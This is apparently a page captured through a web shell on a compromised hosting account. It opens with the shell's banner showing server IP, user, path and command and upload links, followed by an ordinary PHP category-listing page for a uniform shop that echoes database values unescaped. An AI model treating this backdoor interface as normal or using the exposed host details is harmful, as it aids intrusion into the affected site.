|
Server IP : 82.112.239.40 / Your IP : 216.73.216.81 Web Server : LiteSpeed System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u641149403 ( 641149403) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u641149403/domains/uniformindia.co.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php include('header.php');
?>
<style type="text/css">
body{
overflow-x: hidden;
}
.ftco-section
{
margin-top:15px;
padding: 0em 0;
}
.icons i
{
color:#FD6A02 ;
font-weight: bold;
font-size: 30px;
padding:5px;
}
.othertab
{
background-color:#BEBEBE;
padding:10px;
margin-bottom: 5px;
}
.data
{
margin-top:10px;
padding-top: 10px;
}
.data1
{
margin-left: 20px;
}
.imgstyle
{
box-shadow:5px 0px #d2d5d2;
border-style: solid;
border-width: 0.1px;
}
img
{
width:100%;
height:150px;
}
/*.data:hover
{
padding:20px;
}*/
.heading a
{
font-weight: bold;
color: #3c9fd9 !important;
text-transform: uppercase;
padding-top: 10px;
}
.viewbtn a
{
border-radius:8px;
background-color: #FD6A02;
color:white !important;
padding:8px;
margin-right:8px;
text-transform: bold;
}
.viewbtn
{
margin: 30px;
}
.bottmban a
{
background-color: #3c9fd9;
color:white !important;
/*font-size: 18px;*/
word-wrap: normal;
text-align: center;
width: 100%;
height: 40px;
display: inline-block;
white-space: nowrap ;
font-size-adjust: 1.0;
box-shadow:5px 0px #d2d5d2;
padding:5px;
}
.bottmban p
{
border-style: solid;
border-width: 0.5px;
}
/*label p a
{
width:200px;
}*/
</style>
<section class="ftco-section ftco-category ftco-no-pt " >
<div class="heading text-center"><h3><a href="#">All Categories</a></h3></div>
<div class="container-fluid">
<div class="row data1 text-center">
<?php
$querycat="select * from category";
$resc=mysqli_query($con,$querycat);
while($rowc=mysqli_fetch_array($resc))
{
?>
<div class="col-sm-2 data">
<div class="ftco-animate img imgstyle" >
<img src="admin/<?php echo $rowc['image']; ?>">
</div>
<div class="bottmban text-center">
<p><a href="productsby_category.php?id=<?php echo $rowc['id'];?>"><?php echo $rowc['name']; ?></a></p>
</div>
</div>
<?php
}?>
</div>
</div>
</section>
<?php include('footer.php');?>